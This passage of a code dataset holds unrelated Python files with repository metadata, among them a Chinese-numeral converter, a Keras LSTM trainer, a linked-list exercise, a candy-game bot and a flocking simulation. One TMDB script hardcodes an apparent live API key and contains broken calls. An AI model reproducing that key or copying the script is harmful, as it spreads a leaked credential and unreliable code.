range(1,len(num)+1):\r\n if num[-i] != '0':\r\n a = 1\r\n if a:\r\n if i == 1:\r\n num_list.append(number_dict_list[num[-i]][j])\r\n else:\r\n if num[-i] == '0':\r\n num_list.append(number_dict_list[num[-i]][j])\r\n else:\r\n num_list.append(number_dict_list[num[-i]][j] + places_dict_list[-i][j])\r\n # print(num_list)\r\n\r\n a = 1\r\n chnum = ''\r\n for i in range(1,len(num_list)+1):\r\n if num_list[-i] == '零':\r\n if a:\r\n chnum += num_list[-i]\r\n a = 0\r\n else:\r\n chnum += num_list[-i]\r\n a = 1\r\n return chnum\r\n\r\n# 12位及以下阿拉伯数字(str格式)转中文数字\r\ndef num_cnnum(num,CNnumtype=False):\r\n if type(num) != type(''):\r\n raise TypeError(f\"{num}的格式不是'str'\")\r\n\r\n if len(num) < 13:\r\n num_list = split2(num,4)\r\n num_list.reverse()\r\n big_places_list = ['','万','亿']\r\n cnnum_list = []\r\n for i in range(len(num_list)):\r\n cnnum_list.append(num4_cnnum(num_list[i],CNnumtype)+big_places_list[i])\r\n cnnum_list.reverse()\r\n cnnum = ''.join(cnnum_list)\r\n return cnnum\r\n else:\r\n raise CNnumError(f'数字长度太长({len(num)}位)超过了12位,请输入12位以内数字')\r\n\r\ndef help():\r\n print('''主要函数:CNnum_num(chnum):将中文大小写数字转换为阿拉伯数字;\r\n num_cnnum(num,CNnumtype=False)将阿拉伯数字转换为中文数字,CNnumtype定义大小写,默认小写;\r\n split2(string,lenth)规定长度反向分割字符串,例:split2('abcdefghijk',4),返回结果:['abc','defg','hijk']''')\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n # num = 2103\r\n chnum = input('数字')\r\n # print(CNnum_num(chnum))\r\n print(num_cnnum(chnum))","repo_name":"enspidermmmm/python","sub_path":"CNnum.py","file_name":"CNnum.py","file_ext":"py","file_size_in_byte":5276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"15029774313","text":"# -*- coding: utf-8 -*-\n#注意:使用这个要在当前py文件下创建checkpoint文件夹,否则会报错\nfrom keras.callbacks import TensorBoard, ModelCheckpoint, EarlyStopping, CSVLogger\nfrom keras.layers import Dense, Dropout\nfrom keras.layers.recurrent import LSTM\nfrom keras.models import Sequential\nimport os\nimport time\nfrom keras.optimizers import Adam\nfrom keras import optimizers\nimport data_pre2\nimport matplotlib.pyplot as plt\n\ndef lstm(input_shape,nb_classes):\n \"\"\"Build a simple LSTM network. We pass the extracted features from\n our CNN to this model predomenently.\"\"\"\n # Model.\n model = Sequential()\n model.add(LSTM(1024, return_sequences=False,\n input_shape=input_shape,\n dropout=0.5))\n model.add(Dense(512, activation='relu'))\n model.add(Dropout(0.5))\n model.add(Dense(nb_classes, activation='softmax'))\n # optimizer = Adam(lr=1e-5, decay=1e-6)\n metrics = ['accuracy']\n sgd = optimizers.SGD(lr=0.01, decay=1e-6, momentum=0.9, nesterov=True)\n model.compile(loss='categorical_crossentropy', optimizer=sgd,metrics=metrics)\n return model\n\ndef train(trainRoot,testRoot,inputshape,nb_classes,saved_model=None,batch_size=32, nb_epoch=100):\n # Helper: Save the model.\n model='lstm'\n data_type='npy'\n checkpointer = ModelCheckpoint(\n filepath=os.path.join('data', 'checkpoints', model + '-' + data_type + \\\n '.{epoch:03d}-{val_loss:.3f}.hdf5'),\n verbose=1,\n save_best_only=True)\n # Helper: TensorBoard\n tb = TensorBoard(log_dir=os.path.join('data', 'logs', model))\n # Helper: Stop when we stop learning.Stop when the model loss didn't decrease\n early_stopper = EarlyStopping(patience=5)\n # Helper: Save results.\n timestamp = time.time()\n csv_logger = CSVLogger(os.path.join('data', 'logs', model + '-' + 'training-' + \\\n str(timestamp) + '.log'))\n # Get the data and process it.\n # Get samples per epoch.\n # Multiply by 0.7 to attempt to guess how much of data.data is the train set.\n _,size=data_pre2.get_files(trainRoot)\n steps_per_epoch = (size* 0.7) // batch_size\n\n # Get generators.\n generator = data_pre2.read_batchNPY(batch_size, trainRoot)\n val_generator = data_pre2.read_batchNPY(batch_size, testRoot)\n\n # Get the model.\n rm = lstm(inputshape, nb_classes)\n\n # Fit!\n # Use fit generator.\n history=rm.model.fit_generator(\n generator=generator,\n steps_per_epoch=steps_per_epoch,\n epochs=nb_epoch,\n verbose=1,\n callbacks=[tb, early_stopper, csv_logger, checkpointer],\n validation_data=val_generator,\n validation_steps=40,\n workers=4)#表示使用线程数\n # #HDF5和其Python库h5py\n # #model.save_weights('my_model_weights.h5')\n # #如果你需要在代码中初始化一个完全相同的模型,请使用:\n # model.load_weights('my_model_weights.h5')\n # #如果你需要加载权重到不同的网络结构(有些层一样)中,例如fine - tune或transfer - learning,你可以通过层名字来加载模型:\n # model.load_weights('my_model_weights.h5', by_name=True)\n # #list all data in history\n train_loss = history.history['loss']\n val_loss = history.history['val_loss']\n train_acc = history.history['acc']\n val_acc = history.history['val_acc']\n x = range(nb_epoch)\n\n plt.figure(1, figsize=(10, 10))\n plt.plot(x, train_loss)\n plt.plot(x, val_loss)\n plt.plot(x, train_acc)\n plt.plot(x, val_acc)\n\n plt.xlabel('Epochs')\n plt.ylabel('loss and accuracy')\n plt.title('train and val')\n plt.grid(True)\n plt.legend(['train_loss', 'val_loss', 'train_acc', 'val_acc'])\n plt.style.use(['classic'])\n plt.savefig(\"lstm_keras.png\")\n\n\ndef main():\n trainRoot = '/home/a504/PycharmProjects/caffe+lstm/data/train/'\n testRoot = '/home/a504/PycharmProjects/caffe+lstm/data/test/'\n inputshape=(100,1000)\n #这个要与datapre2里面onehot函数的类别相对应\n nb_classes=2\n batch_size=16\n saved_model=None\n nb_epoch = 2\n train(trainRoot, testRoot, inputshape, nb_classes, saved_model, batch_size, nb_epoch)\n\nif __name__ == '__main__':\n main()","repo_name":"FelicityLeung/caffe-lstm","sub_path":"lstm_keras.py","file_name":"lstm_keras.py","file_ext":"py","file_size_in_byte":4177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"7911969903","text":"def arithmetic_arranger(problem_list, solution=False):\n\n # returns an error if the user inputs more than 5 problems\n if len(problem_list) > 5:\n return \"Error: Too many problems.\"\n\n # returns an error if the user inputs a non-numerical operand\n for problem in problem_list:\n problem = problem.split()\n try:\n problem[0] = int(problem[0])\n problem[2] = int(problem[2])\n except:\n return \"Error: Numbers must only contain digits.\"\n\n solution_list = []\n upper_operands = []\n lower_operands = []\n operators = []\n\n # creating 3 lists: 1 for upper operands, 1 for lower operands and 1 for operators\n for problem in problem_list:\n problem = problem.split()\n upper_operands += [problem[0]]\n operators += [problem[1]]\n lower_operands += [problem[2]]\n\n # returning error if len of operand > 4\n if len(problem[0]) > 4 or len(problem[2]) > 4:\n return \"Error: Numbers cannot be more than four digits.\"\n\n # calculating solutions to problems\n else:\n if problem[1] == \"+\":\n y = int(problem[0]) + int(problem[2])\n elif problem[1] == \"-\":\n y = int(problem[0]) - int(problem[2])\n\n # returning error if an operator is not a + or -\n else:\n return \"Error: Operator must be '+' or '-'.\"\n\n solution_list += [y]\n\n upper_str = str()\n lower_str = str()\n solution_str = str()\n dash_str = str()\n\n # creating dash string\n for z in range(0, len(problem_list)):\n dash_str = dash_str + str(\n (max(len(upper_operands[z]), len(lower_operands[z])) + 2) * \"-\" + 4 * \" \"\n )\n\n # converting dash string into dash list which will be used as a basis to format the strings of operands and solutions\n dash_list = list(dash_str.split())\n\n # creating formatted strings of upper and lower operands, as well as the solutions\n for a in range(0, len(problem_list)):\n solution_str = (\n solution_str\n + (len(dash_list[a]) - len(str(solution_list[a]))) * \" \"\n + str(solution_list[a])\n + 4 * \" \"\n )\n upper_str = (\n upper_str\n + (len(dash_list[a]) - len(upper_operands[a])) * \" \"\n + upper_operands[a]\n + 4 * \" \"\n )\n if len(upper_operands[a]) < len(lower_operands[a]):\n lower_str = lower_str + operators[a] + \" \" + lower_operands[a] + 4 * \" \"\n else:\n lower_str = (\n lower_str\n + operators[a]\n + (len(upper_operands[a]) - len(lower_operands[a]) + 1) * \" \"\n + lower_operands[a]\n + 4 * \" \"\n )\n\n # creating string of arranged problems\n if solution is True:\n arranged_problems = (\n upper_str.rstrip()\n + \"\\n\"\n + lower_str.rstrip()\n + \"\\n\"\n + dash_str.rstrip()\n + \"\\n\"\n + solution_str.rstrip()\n )\n else:\n arranged_problems = (\n upper_str.rstrip() + \"\\n\" + lower_str.rstrip() + \"\\n\" + dash_str.rstrip()\n )\n\n return arranged_problems\n\n","repo_name":"Sterari/FreeCodeCamp-Scientific-Computing-with-Python","sub_path":"Arithmetic Formatter/Arithmetic-Formatter.py","file_name":"Arithmetic-Formatter.py","file_ext":"py","file_size_in_byte":3247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"35674631304","text":"###########Question5###########################################################\n'''\nQuestion 5\nFind the element in a singly linked list that's m elements from the end. \nFor example, if a linked list has 5 elements, the 3rd element from the end is \nthe 3rd element. The function definition should look like question5(ll, m), \nwhere ll is the first node of a linked list and m is the \"mth number \nfrom the end\". \n'''\n\nclass LLNode(object):\n\tdef __init__(self, data):\n\t\tself.data = data\n\t\tself.next = None\n\nclass LinkedList(object):\n\tdef __init__(self, head=None):\n\t\tself.head = head\n\n\tdef append(self, new_element):\n\t\tcurrent = self.head\n\t\tif self.head:\n\t\t\twhile current.next:\n\t\t\t\tcurrent = current.next\n\t\t\tcurrent.next = new_element\n\t\telse:\n\t\t\tself.head = new_element\n\n\tdef get_position(self, position):\n\t\t\"\"\"Get an element from a particular position.\n\t\tAssume the first position is \"1\".\n\t\tReturn \"None\" if position is not in the list.\"\"\"\n\t\tcounter = 1\n\t\tcurrent = self.head\n\t\tif position < 1:\n\t\t\treturn None\n\t\twhile current and counter <= position:\n\t\t\tif counter == position:\n\t\t\t\treturn current\n\t\t\tcurrent = current.next\n\t\t\tcounter += 1\n\t\treturn None\n\t\t\n\ndef question5(ll, m):\n\t\n\t## Get the length of linked list\n\tdef get_length(node):\n\t\t\"\"\"Get the total length of the linked list.\"\"\"\n\t\tcounter = 1\n\t\tcurrent = node\n\t\tif current:\n\t\t\twhile current:\n\t\t\t\tcurrent = current.next\n\t\t\t\tcounter += 1\n\t\t\treturn counter\n\t\telse:\n\t\t\treturn None\n\t\t\t\n\tdef get_element(l_list, position):\n\t\t\"\"\"Get an element from a particular position.\n\t\tAssume the first position is \"1\".\n\t\t\"\"\"\n\t\tcounter = 1\n\t\tcurrent = l_list\n\t\tif position < 1:\n\t\t\treturn None\n\t\twhile current and counter <= position:\n\t\t\tif counter == position:\n\t\t\t\treturn current.data\n\t\t\tcurrent = current.next\n\t\t\tcounter += 1\n\t\treturn None\n\t\n\tll_length = get_length(ll)\n\t\n\tif m < ll_length:\n\t\tm_th_from_end = ll_length - m\n\t\tm_th_element = get_element(ll, m_th_from_end)\n\t\tprint(m,'th item from the end is:', m_th_element)\n\telse:\n\t\tprint('Error: linked list is smaller than', m)\n\tprint()\n\n# Test cases\n\n# Create a linked list\nllist = LinkedList()\nfor i in range(1, 100):\n\tllist.append(LLNode(i))\n\nquestion5(llist.get_position(1), 20)\n\n\nllist = LinkedList()\nfor i in range(-4, 5):\n\tllist.append(LLNode(i))\nquestion5(llist.get_position(1), 3)\n\n\nllist = LinkedList()\nfor i in [5,3,7,8,0]:\n\tllist.append(LLNode(i))\nquestion5(llist.get_position(1), 3)\n\nllist = LinkedList()\nfor i in range(-4, 5):\n\tllist.append(LLNode(i))\nquestion5(llist.get_position(1), 20)","repo_name":"lasanthagithub/Technical_interview_questions_Python","sub_path":"Find_an_element_in_a_singly_linked_list_ready.py","file_name":"Find_an_element_in_a_singly_linked_list_ready.py","file_ext":"py","file_size_in_byte":2491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"23358205296","text":"idademin = 101\nclass Worker(object):\n\tdef __init__(self, age):\n\t\tself.below = []\n\t\tself.above = []\n\t\tself.age = age\n\t\tself.skip = False\n\ndef troca(a,b):\n\tglobal w\n\ttmp = a.age\n\ta.age = b.age\n\tb.age = tmp\n\tan = w.index(a)\n\tbn = w.index(b)\n\tw[an] = b\n\tw[bn] = a\n\t\ndef perguntamod(a):\n\tglobal idademin\n\tfor e in a.above:\n\t\tif not e.skip:\n\t\t\tpergunta(e)\n\tif len(a.above) == 0:\n\t\tprint('*')\n\telse:\n\t\tprint(idademin)\n\t\tidademin = 101\n\tfor i in w:\n\t\ti.skip = False\ndef pergunta(a):\n\ta.skip = True\n\tglobal idademin\n\tif a.age < idademin:\n\t\tidademin = a.age\n\tfor e in a.above:\n\t\tif not e.skip:\n\t\t\tpergunta(e)\n\t\t\ndat = input().split()\nn = int(dat[0])\nm = int(dat[1])\ni = int(dat[2])\n\nages = input().split()\nw = []\nfor a in ages:\n\tw.append(Worker(int(a)))\nfor b in range(m):\n\ttemp = [int(x) for x in input().split()]\n\tx = temp[0] - 1\n\ty = temp[1] - 1\n\tw[x].below.append(w[y])\n\tw[y].above.append(w[x])\nfor c in range(i):\n\tacao = input().split()\n\tif acao[0] == \"T\":\n\t\ttroca(w[int(acao[1])-1],w[int(acao[2])-1])\n\telse:\n\t\tperguntamod(w[int(acao[1])-1])","repo_name":"murakn/OBI","sub_path":"2017/chefe.py","file_name":"chefe.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"36523802509","text":"import requests\nimport os\nfrom dotenv import find_dotenv, load_dotenv\n\n\nload_dotenv(find_dotenv())\nAPI_key = \"84e0dabf84e4d9643b17972c39e173e2\"\n\nBASE_URL = \"https://api.themoviedb.org/3/trending/all/day?api_key=<>={API_key}&callback=test\"\nAPI_KEY = os.getenv(\"TMDB_KEY\")\n\nquery_params = {\n \"q\": \"election\",\n \"api-key\": API_KEY\n}\n\nresponse = requests.get(\n BASE_URL,\n query_params=query_params\n)\n\nresponse_json = response.json()\n\ntry:\n articles = response_json[\"response\"][\"page\"][10][\"object\"][\"total_results\"]\n for movie in movies: \n print(movie)\nexcept KeyError:\n print(\"Couldn't fetch movies\")\n","repo_name":"Zeek9223/Georgia_State_University_Code","sub_path":"CSC 4350 Software Engineering-CTW/HW5/Api_.py","file_name":"Api_.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"26377224584","text":"from tkinter import *\nfrom tkinter import ttk\nfrom tkinter import messagebox\n\ndef open_msg_box():\n messagebox.showwarning(\"Event Triggered\",\"Button Clicked\")\n\nroot=Tk()\n\nroot.geometry(\"400x400+300+300\")\nroot.resizable(width=False,height=False)\n\nframe=Frame(root)\n\nstyle=ttk.Style()\n\nstyle.configure(\"TButton\",\n foreground=\"midnight blue\",\n font=\"Times 20 bold italic\",\n padding=20)\n#Ttk widget names: TButton, TCheckButton, TCombobox,\n#TEntry, TFrame, TLabel, TLabelframe, TMenubutton,\n#TNotebook, TProgressbar, TRadiobutton, TScale,\n#TScrollbar, TSpinbox, Treeview\n\nprint(ttk.Style().theme_names())\nprint(style.lookup(\"TButton\",\"font\"))\nprint(style.lookup(\"TButton\",\"foreground\"))\nprint(style.lookup(\"TButton\",\"padding\"))\n\nttk.Style().theme_use('clam')\n\ntheButton=ttk.Button(frame,\n text=\"Important Button\",\n command=open_msg_box)\n\ntheButton['state']='disabled'\ntheButton['state']='normal'\n\ntheButton.pack()\n\nframe.pack()\n\nroot.mainloop()","repo_name":"sharmasourab93/JustPython","sub_path":"tkinter/TkInter22.py","file_name":"TkInter22.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"18768349762","text":"'''\r\nThese classes permit to run the iterator in a another process and pass the data via pickling (slow, works always)\r\nor shared memory (fast, works only for numeric numpy arrays of a defined and known in advance maximum size).\r\n\r\nThey can be used via multiple inheritance: the final dataset class simply inherits from both the \r\nSimpleDatasetScaffolding and MutiprocessingDatasetMixin.\r\n\r\nCreated on Aug 22, 2014\r\n\r\n@author: chorows\r\n'''\r\n\r\nimport numpy as np\r\n\r\nimport multiprocessing\r\nfrom . import shmarray\r\n\r\nfrom itertools import izip\r\nimport functools\r\n\r\nfrom .. import SimpleDatasetScaffolding\r\nfrom ..iterators import AbstractWrappedIterator, AbstractDataIterator\r\nfrom collections import OrderedDict\r\n\r\nclass MultiprocessingPicklingDataIterator(AbstractWrappedIterator):\r\n def __init__(self, iterator, qlen=2, **kwargs):\r\n super(MultiprocessingPicklingDataIterator, self).__init__(iterator=iterator, **kwargs)\r\n assert qlen>1\r\n self.q = multiprocessing.Queue(qlen)\r\n self.proc = multiprocessing.Process(target=MultiprocessingPicklingDataIterator.__subprocess,\r\n args=(self.iterator, self.q))\r\n self.proc.start()\r\n \r\n @staticmethod\r\n def __subprocess(iterator, q):\r\n for batch in iterator:\r\n q.put(tuple(batch))\r\n q.put(StopIteration)\r\n \r\n def next(self):\r\n if self.proc is None:\r\n raise StopIteration\r\n o = self.q.get()\r\n if o is StopIteration:\r\n #is this needed?\r\n self.proc.terminate()\r\n self.proc.join()\r\n self.proc=None\r\n raise StopIteration\r\n return self.make(o)\r\n\r\n def close(self):\r\n if self.proc:\r\n self.proc.terminate()\r\n #while self.q.get(0)\r\n # pass\r\n self.proc.join()\r\n self.proc=None\r\n \r\n def __del__(self):\r\n self.close()\r\n\r\nclass MultiprocessingSHMDataIterator(AbstractWrappedIterator):\r\n def __init__(self, iterator, qlen=2):\r\n assert qlen>1\r\n super(MultiprocessingSHMDataIterator, self).__init__(iterator=iterator)\r\n \r\n srcs = self.sources\r\n assert isinstance(srcs, OrderedDict)\r\n \r\n self.pipe, self.child_pipe = multiprocessing.Pipe()\r\n self.arrays = []\r\n for i in xrange(qlen+1):\r\n arr_tuple = tuple(shmarray.create(shape=(self.batch_size * np.prod(spc.dim), ), \r\n dtype=spc.dtype) \r\n for spc in srcs.values()\r\n ) \r\n self.arrays.append(arr_tuple)\r\n \r\n for i in xrange(qlen):\r\n self.pipe.send(i)\r\n self.last_idx = qlen\r\n self.subproc = multiprocessing.Process(target=MultiprocessingSHMDataIterator.__subprocess,\r\n args=(self.iterator, self.child_pipe, self.arrays))\r\n self.subproc.start()\r\n \r\n @staticmethod\r\n def __subprocess(iterator, pipe, arrays):\r\n for batch in iterator:\r\n arr_idx = pipe.recv()\r\n shapes = tuple(a.shape for a in batch)\r\n #print 'got batch: ', batch, ' shapes: ', shapes\r\n for da,ba in izip(arrays[arr_idx], batch):\r\n flat_ary = ba.ravel()\r\n #print 'da: ', da, 'flat ary; ', flat_ary\r\n da[:flat_ary.shape[0]] = flat_ary\r\n pipe.send((arr_idx, shapes))\r\n pipe.send(StopIteration)\r\n \r\n def next(self):\r\n if not self.subproc:\r\n raise StopIteration\r\n \r\n self.pipe.send(self.last_idx)\r\n o = self.pipe.recv()\r\n if o is StopIteration:\r\n self.subproc.join()\r\n self.subproc=None\r\n raise StopIteration\r\n arr_idx, shapes = o\r\n ret = self.make(a[:np.prod(s)].reshape(s) for a,s in izip(self.arrays[arr_idx],shapes))\r\n self.last_idx = arr_idx\r\n return ret\r\n \r\n def close(self):\r\n if self.subproc:\r\n self.subproc.terminate()\r\n #while self.q.get(0)\r\n # pass\r\n self.subproc.join()\r\n self.subproc=None\r\n \r\n def __del__(self):\r\n self.close()\r\n\r\nclass MutiprocessingDatasetMixin(object):\r\n '''\r\n A mixin that fetchets the data in another process.\r\n \r\n Parameters\r\n ----------\r\n \r\n mp_method: one of pickle, shm\r\n ''' \r\n def __init__(self, *args, **kwargs):\r\n self._mp_method = kwargs.pop('mp_method','shm')\r\n self._qlen = kwargs.pop('qlen', 2)\r\n \r\n super(MutiprocessingDatasetMixin,self).__init__(*args, **kwargs)\r\n \r\n @functools.wraps(SimpleDatasetScaffolding._get_iterator)\r\n def _get_iterator(self, mode, batch_size, desired_sources, rng):\r\n if rng is not None:\r\n rng = np.random.RandomState(rng.randint(-9223372036854775808, 9223372036854775807, (10,)))\r\n \r\n gi_func = getattr(self, '_get_iterator_' + self._mp_method)\r\n return gi_func(mode, batch_size, desired_sources, rng)\r\n \r\n def _get_iterator_pickle(self, mode, batch_size, desired_sources, rng): \r\n it = super(MutiprocessingDatasetMixin,self)._get_iterator(mode, batch_size, desired_sources, rng)\r\n return MultiprocessingPicklingDataIterator(it, qlen=self._qlen)\r\n\r\n def _get_iterator_shm(self, mode, batch_size, desired_sources, rng):\r\n it = super(MutiprocessingDatasetMixin,self)._get_iterator(mode, batch_size, desired_sources, rng)\r\n return MultiprocessingSHMDataIterator(it, qlen=self._qlen)\r\n","repo_name":"janchorowski/data_iterators","sub_path":"dataset/multiproc/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"73024199923","text":"# Создайте программу для игры с конфетами человек против человека.\n# Условие задачи: На столе лежит 2021 конфета. Играют два игрока делая ход друг после друга.\n# Первый ход определяется жеребьёвкой. За один ход можно забрать не более чем 28 конфет.\n# Все конфеты оппонента достаются сделавшему последний ход. Сколько конфет нужно взять первому игроку,\n# чтобы забрать все конфеты у своего конкурента?\n\n# a) Добавьте игру против бота\n# b) Подумайте как наделить бота \"\"интеллектом\"\"\n\n# Параметры\n# Сколько конфет в куче\nheap = 2021\n\n# Сколько максимально конфет можно взять за один ход\none_turn = 28\n\n\ndef bot_turn(h,t):\n ret = 0\n if h > t:\n ret = h % (t + 1)\n if ret == 0: return 1 # нас ведут к проигышу, но мы надеемся...\n else: return ret # тут у нас выйгрышный вариант\n else: return h # берем последние конфеты\n\nprint('Игра \"Конфетный бот\"')\nprint('Правила игры:')\nprint('')\nprint(f'Играют 2 игрока. Есть куча из {heap} конфет. Нужно по-очереди брать из этой кучи')\nprint(f'конфеты от 1 до {one_turn} штук. Пропускать ход нельзя.')\nprint('Выигрывает тот, кто заберет последнюю конфету')\n\nprint('Кто будет ходить первым?')\nprint('1 - Бот, 2 - Человек')\nnum = int(input('Введите 1 или 2: '))\nwhile not (num in [1,2]):\n print('Вы ввели неправильное число.')\n num = int(input('Введите 1 или 2: '))\n\nbot_move = False\n\nif num == 1: bot_move = True\n\nbot_win = True\nwhile heap > 0:\n print('')\n print(f'Сейчас в куче {heap} конфет')\n if bot_move:\n turn = bot_turn(heap,one_turn)\n print(f'Мой ход. Я возьму {turn} штук(и).')\n else:\n print('Сколько конфет Вы берете?')\n turn = int(input(f'Возьмите от 1 до {one_turn} конфет: '))\n while not (0 < turn and turn<= one_turn):\n print('Вы ввели неправильное число.')\n turn = int(input(f'Возьмите от 1 до {one_turn} конфет: '))\n heap -= turn\n if heap < 1:\n if not bot_move: bot_win = False\n break\n bot_move = not bot_move\n\nprint('В куче больше нет конфет.')\nif bot_win: print('Я победил! Я счастлив!')\nelse: print('Я проиграл. Я в печали...')\n","repo_name":"Zep314/PyHW05","sub_path":"task02.py","file_name":"task02.py","file_ext":"py","file_size_in_byte":3028,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"15204500574","text":"from enum import Enum, auto\r\nimport os\r\n\r\nimport pygame as pg\r\nfrom pygame.math import Vector2\r\nfrom vi import Agent, Simulation\r\nfrom vi.config import Config, dataclass, deserialize\r\n\r\n\r\n@deserialize\r\n@dataclass\r\nclass FlockingConfig(Config):\r\n alignment_weight: float = 0.5\r\n cohesion_weight: float = 0.5\r\n separation_weight: float = 0.5\r\n\r\n b_weight: float = 0.5\r\n b_dist: int = 20\r\n\r\n frame_count = 0\r\n\r\n delta_time: float = 3\r\n\r\n mass: int = 20\r\n\r\n\r\n def weights(self) -> tuple[float, float, float]:\r\n return (self.alignment_weight, self.cohesion_weight, self.separation_weight)\r\n\r\ndef sum_vec2(list: list[Vector2]) -> Vector2:\r\n result = Vector2(0, 0)\r\n for vec in list:\r\n result += vec\r\n return result\r\n\r\n\r\n\r\nclass Bird(Agent):\r\n config: FlockingConfig\r\n\r\n #i = 0\r\n\r\n def change_position(self):\r\n\r\n # Pac-man-style teleport to the other end of the screen when trying to escape\r\n self.there_is_no_escape()\r\n\r\n #YOUR CODE HERE -----------\r\n\r\n neighbors = list(self.in_proximity_accuracy().without_distance())\r\n\r\n neighbor_count = len(neighbors)\r\n\r\n a, c, s = self.config.weights() \r\n\r\n prng = self.shared.prng_move\r\n\r\n should_change_angle = prng.random()\r\n\r\n deg = prng.uniform(-10, 10)\r\n\r\n if neighbor_count != 0:\r\n\r\n pos_arr = [agent.pos for agent in neighbors]\r\n\r\n vec_arr = [agent.move for agent in neighbors]\r\n\r\n ave_v = sum_vec2(vec_arr) / neighbor_count\r\n\r\n alignment = (ave_v - self.move) * a\r\n\r\n seperation = Vector2(0, 0)\r\n\r\n for neighbor in neighbors:\r\n seperation += self.pos - neighbor.pos\r\n\r\n seperation = seperation / neighbor_count * s\r\n\r\n center = sum_vec2(pos_arr) / neighbor_count\r\n cohesion = ((center - self.pos) - self.move) * c\r\n\r\n v4 = Vector2(0, 0)\r\n\r\n for i in range(2):\r\n if self.pos[i] < self.config.b_dist:\r\n v4[i] += self.config.b_weight\r\n elif self.pos[i] > self.config.window.as_tuple()[i] - self.config.b_dist:\r\n v4[i] -= self.config.b_weight\r\n\r\n self.move += (alignment + seperation + cohesion + v4)\r\n self.move = self.move.normalize()\r\n\r\n if 0.7 > should_change_angle:\r\n self.move.rotate_ip(deg)\r\n\r\n self.pos += self.move\r\n\r\n #END CODE -----------------\r\n\r\n\r\nclass Selection(Enum):\r\n ALIGNMENT = auto()\r\n COHESION = auto()\r\n SEPARATION = auto()\r\n\r\nclass FlockingLive(Simulation):\r\n selection: Selection = Selection.ALIGNMENT\r\n config: FlockingConfig\r\n\r\n def handle_event(self, by: float):\r\n if self.selection == Selection.ALIGNMENT:\r\n self.config.alignment_weight += by\r\n elif self.selection == Selection.COHESION:\r\n self.config.cohesion_weight += by\r\n elif self.selection == Selection.SEPARATION:\r\n self.config.separation_weight += by\r\n\r\n def before_update(self):\r\n super().before_update()\r\n\r\n for event in pg.event.get():\r\n if event.type == pg.KEYDOWN:\r\n if event.key == pg.K_UP:\r\n self.handle_event(by=0.1)\r\n elif event.key == pg.K_DOWN:\r\n self.handle_event(by=-0.1)\r\n elif event.key == pg.K_1:\r\n self.selection = Selection.ALIGNMENT\r\n elif event.key == pg.K_2:\r\n self.selection = Selection.COHESION\r\n elif event.key == pg.K_3:\r\n self.selection = Selection.SEPARATION\r\n elif event.key == pg.K_q:\r\n self._running = False\r\n\r\n a, c, s = self.config.weights()\r\n self.config.frame_count += 1\r\n print(\"Frame :\", self.config.frame_count)\r\n print(f\"A: {a:.1f} - C: {c:.1f} - S: {s:.1f}\")\r\n\r\nconfig = FlockingConfig(\r\n image_rotation=True,\r\n movement_speed=1,\r\n radius=50,\r\n seed=1,\r\n visualise_chunks=True\r\n )\r\n\r\nx, y = config.window.as_tuple()\r\n\r\ndf = FlockingLive(config).batch_spawn_agents(100, Bird, images=[\"images/bird.png\"]).run().snapshots\r\n\r\nfile_name = \"data.csv\"\r\n\r\nprint(df)\r\n\r\nif not os.path.exists(file_name):\r\n with open(file_name, 'w'): pass\r\n\r\ndf.write_csv(file_name, separator=\",\")\r\n\r\nprint(\"Output: \", file_name)\r\n","repo_name":"Copy-Kat/ass0","sub_path":"flocking.py","file_name":"flocking.py","file_ext":"py","file_size_in_byte":4459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"42041132318","text":"def confidence_interval(n, x_mean, sigma, gamma=0.95, digits=2):\n \"\"\"Calculation confidence interval\n X_mean = +/-z_crit * (sigma/n**0.5)\n\n Args:\n n (int): sample size\n x_mean (float): sample mean\n sigma (float): true standard deviation\n gamma (float, optional): reliability level. Default is 0.95\n digits (int, optional): the number of decimals to use when\n rounding the number. Default is 2\n \n Returns:\n confidence_interval (tuple): rounded confidence interval bounds\n \"\"\"\n from scipy.stats import norm\n \n alpha = 1 - gamma\n z_crit = -norm.ppf(alpha/2) \n eps = z_crit * sigma/(n ** 0.5) #error\n lower_bound = x_mean - eps # left (bottom) border\n upper_bound = x_mean + eps # right (top) border\n confidence_interval = (round(lower_bound, digits),\n round(upper_bound, digits)) \n return confidence_interval\n \n \ndef t_distribution(n, x_mean, x_std, gamma=0.95, digits=2):\n \"\"\"Calculation \"t\"-distribution\n X_mean = +/-t_crit * (x_std/n**0.5)\n\n Args:\n n (int): sample size\n x_mean (float): sample mean\n x_std (float): sample standard deviation\n gamma (float, optional): reliability level. Default is 0.95\n digits (int, optional): the number of decimals to use when\n rounding the number. Default is 2\n \n Returns:\n t_distribution (tuple): rounded \"t\"-distribution bounds\n \"\"\"\n from scipy.stats import t\n \n alpha = 1 - gamma\n k = n - 1\n t_crit = -t.ppf(alpha/2, k)\n eps = t_crit * x_std/(n ** 0.5) # error\n lower_bound = x_mean - eps # left (bottom) border\n upper_bound = x_mean + eps # right (top) border\n t_distribution = (round(lower_bound, digits),\n round(upper_bound, digits)) \n return t_distribution\n\n\ndef proportions_conf_interval(n, x_p, gamma=0.95, digits=2): \n \"\"\"Calculation confidence interval for proportions\n = +/-z_crit * (x_p(1 - xp)/n**0.5)\n\n Args:\n n (int): sample size\n x_p (float): sample proportion\n gamma (float, optional): reliability level. Default is 0.95\n digits (int, optional): the number of decimals to use when\n rounding the number. Default is 2\n \n Returns:\n Confidence interval for proportion, %\n \"\"\" \n from scipy.stats import norm\n \n alpha = 1 - gamma \n z_crit = 